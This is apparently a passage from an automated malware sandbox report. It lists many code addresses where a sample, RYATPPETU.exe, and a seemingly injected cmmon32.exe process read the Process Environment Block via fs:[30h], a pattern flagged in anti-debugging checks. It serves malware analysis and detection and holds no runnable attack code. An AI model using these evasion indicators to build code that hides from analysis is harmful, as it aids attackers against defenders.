Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E728DF1 mov eax, dword ptr fs:[00000030h]	8_2_1E728DF1
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E67B1E1 mov eax, dword ptr fs:[00000030h]	8_2_1E67B1E1
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E67B1E1 mov eax, dword ptr fs:[00000030h]	8_2_1E67B1E1
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E67B1E1 mov eax, dword ptr fs:[00000030h]	8_2_1E67B1E1
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6A35A1 mov eax, dword ptr fs:[00000030h]	8_2_1E6A35A1
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E69C182 mov eax, dword ptr fs:[00000030h]	8_2_1E69C182
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E672D8A mov eax, dword ptr fs:[00000030h]	8_2_1E672D8A
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E672D8A mov eax, dword ptr fs:[00000030h]	8_2_1E672D8A
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E672D8A mov eax, dword ptr fs:[00000030h]	8_2_1E672D8A
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E672D8A mov eax, dword ptr fs:[00000030h]	8_2_1E672D8A
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E672D8A mov eax, dword ptr fs:[00000030h]	8_2_1E672D8A
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6AA185 mov eax, dword ptr fs:[00000030h]	8_2_1E6AA185
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F958EC mov eax, dword ptr fs:[00000030h]	15_2_04F958EC
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05068D34 mov eax, dword ptr fs:[00000030h]	15_2_05068D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_0501A537 mov eax, dword ptr fs:[00000030h]	15_2_0501A537
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05013540 mov eax, dword ptr fs:[00000030h]	15_2_05013540
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FCF0BF mov ecx, dword ptr fs:[00000030h]	15_2_04FCF0BF
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FCF0BF mov eax, dword ptr fs:[00000030h]	15_2_04FCF0BF
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FCF0BF mov eax, dword ptr fs:[00000030h]	15_2_04FCF0BF
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD90AF mov eax, dword ptr fs:[00000030h]	15_2_04FD90AF
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC20A0 mov eax, dword ptr fs:[00000030h]	15_2_04FC20A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC20A0 mov eax, dword ptr fs:[00000030h]	15_2_04FC20A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC20A0 mov eax, dword ptr fs:[00000030h]	15_2_04FC20A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC20A0 mov eax, dword ptr fs:[00000030h]	15_2_04FC20A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC20A0 mov eax, dword ptr fs:[00000030h]	15_2_04FC20A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC20A0 mov eax, dword ptr fs:[00000030h]	15_2_04FC20A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA849B mov eax, dword ptr fs:[00000030h]	15_2_04FA849B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F99080 mov eax, dword ptr fs:[00000030h]	15_2_04F99080
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FB746D mov eax, dword ptr fs:[00000030h]	15_2_04FB746D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_050169A6 mov eax, dword ptr fs:[00000030h]	15_2_050169A6
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_050605AC mov eax, dword ptr fs:[00000030h]	15_2_050605AC
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_050605AC mov eax, dword ptr fs:[00000030h]	15_2_050605AC
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FB0050 mov eax, dword ptr fs:[00000030h]	15_2_04FB0050
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FB0050 mov eax, dword ptr fs:[00000030h]	15_2_04FB0050
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FCA44B mov eax, dword ptr fs:[00000030h]	15_2_04FCA44B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_050151BE mov eax, dword ptr fs:[00000030h]	15_2_050151BE
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_050151BE mov eax, dword ptr fs:[00000030h]	15_2_050151BE
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_050151BE mov eax, dword ptr fs:[00000030h]	15_2_050151BE
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_050151BE mov eax, dword ptr fs:[00000030h]	15_2_050151BE
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05016DC9 mov eax, dword ptr fs:[00000030h]	15_2_05016DC9
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05016DC9 mov eax, dword ptr fs:[00000030h]	15_2_05016DC9
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05016DC9 mov eax, dword ptr fs:[00000030h]	15_2_05016DC9
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05016DC9 mov ecx, dword ptr fs:[00000030h]	15_2_05016DC9
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05016DC9 mov eax, dword ptr fs:[00000030h]	15_2_05016DC9
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05016DC9 mov eax, dword ptr fs:[00000030h]	15_2_05016DC9
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FAB02A mov eax, dword ptr fs:[00000030h]	15_2_04FAB02A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FAB02A mov eax, dword ptr fs:[00000030h]	15_2_04FAB02A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FAB02A mov eax, dword ptr fs:[00000030h]	15_2_04FAB02A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FAB02A mov eax, dword ptr fs:[00000030h]	15_2_04FAB02A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FCBC2C mov eax, dword ptr fs:[00000030h]	15_2_04FCBC2C
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC002D mov eax, dword ptr fs:[00000030h]	15_2_04FC002D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC002D mov eax, dword ptr fs:[00000030h]	15_2_04FC002D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC002D mov eax, dword ptr fs:[00000030h]	15_2_04FC002D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC002D mov eax, dword ptr fs:[00000030h]	15_2_04FC002D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC002D mov eax, dword ptr fs:[00000030h]	15_2_04FC002D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_050241E8 mov eax, dword ptr fs:[00000030h]	15_2_050241E8
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05048DF1 mov eax, dword ptr fs:[00000030h]	15_2_05048DF1
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h]	15_2_05051C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h]	15_2_05051C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h]	15_2_05051C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h]	15_2_05051C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h]	15_2_05051C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h]	15_2_05051C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h]	15_2_05051C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h]	15_2_05051C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h]	15_2_05051C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h]	15_2_05051C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h]	15_2_05051C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h]	15_2_05051C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h]	15_2_05051C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h]	15_2_05051C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_0506740D mov eax, dword ptr fs:[00000030h]	15_2_0506740D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_0506740D mov eax, dword ptr fs:[00000030h]	15_2_0506740D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_0506740D mov eax, dword ptr fs:[00000030h]	15_2_0506740D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05016C0A mov eax, dword ptr fs:[00000030h]	15_2_05016C0A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05016C0A mov eax, dword ptr fs:[00000030h]	15_2_05016C0A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05016C0A mov eax, dword ptr fs:[00000030h]	15_2_05016C0A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05016C0A mov eax, dword ptr fs:[00000030h]	15_2_05016C0A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05064015 mov eax, dword ptr fs:[00000030h]	15_2_05064015
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05064015 mov eax, dword ptr fs:[00000030h]	15_2_05064015
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05017016 mov eax, dword ptr fs:[00000030h]	15_2_05017016
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05017016 mov eax, dword ptr fs:[00000030h]	15_2_05017016
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05017016 mov eax, dword ptr fs:[00000030h]	15_2_05017016
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F9B1E1 mov eax, dword ptr fs:[00000030h]	15_2_04F9B1E1
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F9B1E1 mov eax, dword ptr fs:[00000030h]	15_2_04F9B1E1
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F9B1E1 mov eax, dword ptr fs:[00000030h]	15_2_04F9B1E1
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FAD5E0 mov eax, dword ptr fs:[00000030h]	15_2_04FAD5E0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FAD5E0 mov eax, dword ptr fs:[00000030h]	15_2_04FAD5E0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC1DB5 mov eax, dword ptr fs:[00000030h]	15_2_04FC1DB5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC1DB5 mov eax, dword ptr fs:[00000030h]	15_2_04FC1DB5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC1DB5 mov eax, dword ptr fs:[00000030h]	15_2_04FC1DB5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_0502C450 mov eax, dword ptr fs:[00000030h]	15_2_0502C450
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_0502C450 mov eax, dword ptr fs:[00000030h]	15_2_0502C450
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC61A0 mov eax, dword ptr fs:[00000030h]	15_2_04FC61A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC61A0 mov eax, dword ptr fs:[00000030h]	15_2_04FC61A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC35A1 mov eax, dword ptr fs:[00000030h]	15_2_04FC35A1
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FCFD9B mov eax, dword ptr fs:[00000030h]	15_2_04FCFD9B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FCFD9B mov eax, dword ptr fs:[00000030h]	15_2_04FCFD9B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC2990 mov eax, dword ptr fs:[00000030h]	15_2_04FC2990
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05061074 mov eax, dword ptr fs:[00000030h]	15_2_05061074
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F92D8A mov eax, dword ptr fs:[00000030h]	15_2_04F92D8A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F92D8A mov eax, dword ptr fs:[00000030h]	15_2_04F92D8A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F92D8A mov eax, dword ptr fs:[00000030h]	15_2_04F92D8A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F92D8A mov eax, dword ptr fs:[00000030h]	15_2_04F92D8A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F92D8A mov eax, dword ptr fs:[00000030h]	15_2_04F92D8A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05052073 mov eax, dword ptr fs:[00000030h]	15_2_05052073
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FCA185 mov eax, dword ptr fs:[00000030h]	15_2_04FCA185
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FBC182 mov eax, dword ptr fs:[00000030h]	15_2_04FBC182
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC2581 mov eax, dword ptr fs:[00000030h]	15_2_04FC2581
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC2581 mov eax, dword ptr fs:[00000030h]	15_2_04FC2581
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC2581 mov eax, dword ptr fs:[00000030h]	15_2_04FC2581
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC2581 mov eax, dword ptr fs:[00000030h]	15_2_04FC2581
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05013884 mov eax, dword ptr fs:[00000030h]	15_2_05013884
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05013884 mov eax, dword ptr fs:[00000030h]	15_2_05013884
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F9B171 mov eax, dword ptr fs:[00000030h]	15_2_04F9B171
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F9B171 mov eax, dword ptr fs:[00000030h]	15_2_04F9B171
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FBC577 mov eax, dword ptr fs:[00000030h]	15_2_04FBC577
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FBC577 mov eax, dword ptr fs:[00000030h]	15_2_04FBC577
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F9C962 mov eax, dword ptr fs:[00000030h]	15_2_04F9C962
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FB7D50 mov eax, dword ptr fs:[00000030h]	15_2_04FB7D50
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD3D43 mov eax, dword ptr fs:[00000030h]	15_2_04FD3D43
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FBB944 mov eax, dword ptr fs:[00000030h]	15_2_04FBB944
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FBB944 mov eax, dword ptr fs:[00000030h]	15_2_04FBB944
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC513A mov eax, dword ptr fs:[00000030h]	15_2_04FC513A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC513A mov eax, dword ptr fs:[00000030h]	15_2_04FC513A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC4D3B mov eax, dword ptr fs:[00000030h]	15_2_04FC4D3B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC4D3B mov eax, dword ptr fs:[00000030h]	15_2_04FC4D3B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC4D3B mov eax, dword ptr fs:[00000030h]	15_2_04FC4D3B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F9AD30 mov eax, dword ptr fs:[00000030h]	15_2_04F9AD30
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h]	15_2_04FA3D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h]	15_2_04FA3D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h]	15_2_04FA3D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h]	15_2_04FA3D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h]	15_2_04FA3D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h]	15_2_04FA3D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h]	15_2_04FA3D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h]	15_2_04FA3D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h]	15_2_04FA3D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h]	15_2_04FA3D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h]	15_2_04FA3D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h]	15_2_04FA3D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h]	15_2_04FA3D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05068CD6 mov eax, dword ptr fs:[00000030h]	15_2_05068CD6
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_0502B8D0 mov eax, dword ptr fs:[00000030h]	15_2_0502B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_0502B8D0 mov ecx, dword ptr fs:[00000030h]	15_2_0502B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_0502B8D0 mov eax, dword ptr fs:[00000030h]	15_2_0502B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_0502B8D0 mov eax, dword ptr fs:[00000030h]	15_2_0502B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_0502B8D0 mov eax, dword ptr fs:[00000030h]	15_2_0502B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_0502B8D0 mov eax, dword ptr fs:[00000030h]	15_2_0502B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FB4120 mov eax, dword ptr fs:[00000030h]	15_2_04FB4120
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FB4120 mov eax, dword ptr fs:[00000030h]	15_2_04FB4120
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FB4120 mov eax, dword ptr fs:[00000030h]	15_2_04FB4120
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FB4120 mov eax, dword ptr fs:[00000030h]	15_2_04FB4120
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FB4120 mov ecx, dword ptr fs:[00000030h]	15_2_04FB4120
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05016CF0 mov eax, dword ptr fs:[00000030h]	15_2_05016CF0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05016CF0 mov eax, dword ptr fs:[00000030h]	15_2_05016CF0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05016CF0 mov eax, dword ptr fs:[00000030h]	15_2_05016CF0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F99100 mov eax, dword ptr fs:[00000030h]	15_2_04F99100
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F99100 mov eax, dword ptr fs:[00000030h]	15_2_04F99100
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F99100 mov eax, dword ptr fs:[00000030h]	15_2_04F99100
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_050514FB mov eax, dword ptr fs:[00000030h]	15_2_050514FB
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_0506070D mov eax, dword ptr fs:[00000030h]	15_2_0506070D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_0506070D mov eax, dword ptr fs:[00000030h]	15_2_0506070D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_0502FF10 mov eax, dword ptr fs:[00000030h]	15_2_0502FF10
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_0502FF10 mov eax, dword ptr fs:[00000030h]	15_2_0502FF10
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA76E2 mov eax, dword ptr fs:[00000030h]	15_2_04FA76E2
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC2AE4 mov eax, dword ptr fs:[00000030h]	15_2_04FC2AE4
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC16E0 mov ecx, dword ptr fs:[00000030h]	15_2_04FC16E0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_0505131B mov eax, dword ptr fs:[00000030h]	15_2_0505131B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC36CC mov eax, dword ptr fs:[00000030h]	15_2_04FC36CC
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC2ACB mov eax, dword ptr fs:[00000030h]	15_2_04FC2ACB
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD8EC7 mov eax, dword ptr fs:[00000030h]	15_2_04FD8EC7
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FAAAB0 mov eax, dword ptr fs:[00000030h]	15_2_04FAAAB0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FAAAB0 mov eax, dword ptr fs:[00000030h]	15_2_04FAAAB0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FCFAB0 mov eax, dword ptr fs:[00000030h]	15_2_04FCFAB0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F952A5 mov eax, dword ptr fs:[00000030h]	15_2_04F952A5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F952A5 mov eax, dword ptr fs:[00000030h]	15_2_04F952A5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F952A5 mov eax, dword ptr fs:[00000030h]	15_2_04F952A5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F952A5 mov eax, dword ptr fs:[00000030h]	15_2_04F952A5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F952A5 mov eax, dword ptr fs:[00000030h]	15_2_04F952A5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05068B58 mov eax, dword ptr fs:[00000030h]	15_2_05068B58
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FCD294 mov eax, dword ptr fs:[00000030h]	15_2_04FCD294
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FCD294 mov eax, dword ptr fs:[00000030h]	15_2_04FCD294
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05068F6A mov eax, dword ptr fs:[00000030h]	15_2_05068F6A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_0504D380 mov ecx, dword ptr fs:[00000030h]	15_2_0504D380
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD927A mov eax, dword ptr fs:[00000030h]	15_2_04FD927A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FBAE73 mov eax, dword ptr fs:[00000030h]	15_2_04FBAE73
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FBAE73 mov eax, dword ptr fs:[00000030h]	15_2_04FBAE73
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FBAE73 mov eax, dword ptr fs:[00000030h]	15_2_04FBAE73
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FBAE73 mov eax, dword ptr fs:[00000030h]	15_2_04FBAE73
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FBAE73 mov eax, dword ptr fs:[00000030h]	15_2_04FBAE73
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_0505138A mov eax, dword ptr fs:[00000030h]	15_2_0505138A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05017794 mov eax, dword ptr fs:[00000030h]	15_2_05017794
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05017794 mov eax, dword ptr fs:[00000030h]	15_2_05017794
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05017794 mov eax, dword ptr fs:[00000030h]	15_2_05017794
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA766D mov eax, dword ptr fs:[00000030h]	15_2_04FA766D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05065BA5 mov eax, dword ptr fs:[00000030h]	15_2_05065BA5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F99240 mov eax, dword ptr fs:[00000030h]	15_2_04F99240
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F99240 mov eax, dword ptr fs:[00000030h]	15_2_04F99240
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F99240 mov eax, dword ptr fs:[00000030h]	15_2_04F99240
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F99240 mov eax, dword ptr fs:[00000030h]	15_2_04F99240
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA7E41 mov eax, dword ptr fs:[00000030h]	15_2_04FA7E41
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA7E41 mov eax, dword ptr fs:[00000030h]	15_2_04FA7E41
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA7E41 mov eax, dword ptr fs:[00000030h]	15_2_04FA7E41
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA7E41 mov eax, dword ptr fs:[00000030h]	15_2_04FA7E41
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA7E41 mov eax, dword ptr fs:[00000030h]	15_2_04FA7E41
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA7E41 mov eax, dword ptr fs:[00000030h]	15_2_04FA7E41
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_050153CA mov eax, dword ptr fs:[00000030h]	15_2_050153CA
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_050153CA mov eax, dword ptr fs:[00000030h]	15_2_050153CA
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD4A2C mov eax, dword ptr fs:[00000030h]	15_2_04FD4A2C
